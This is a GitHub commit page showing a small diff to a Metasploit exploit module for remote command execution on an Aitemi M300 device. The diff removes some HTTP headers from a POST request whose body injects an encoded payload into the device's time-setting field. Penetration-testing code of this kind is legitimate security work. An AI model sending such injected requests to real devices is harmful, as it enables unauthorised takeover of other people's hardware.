We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 87eb063 commit ff4ede9Copy full SHA for ff4ede9
modules/exploits/linux/http/aitemi_m300_time_rce.rb
@@ -122,11 +122,6 @@ def exploit
122
send_request_cgi(
123
'method' => 'POST',
124
'uri' => normalize_uri(target_uri.path, 'protocol.csp?'),
125
- 'headers' => {
126
- 'Origin' => "http://#{rhost}",
127
- 'Referer' => "http://#{rhost}/network.html",
128
- 'X-Requested-With' => 'XMLHttpRequest'
129
- },
130
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
131
'data' => "fname=system&opt=time_conf&function=set&time=#{encoded_payload}"
132
)
0 commit comments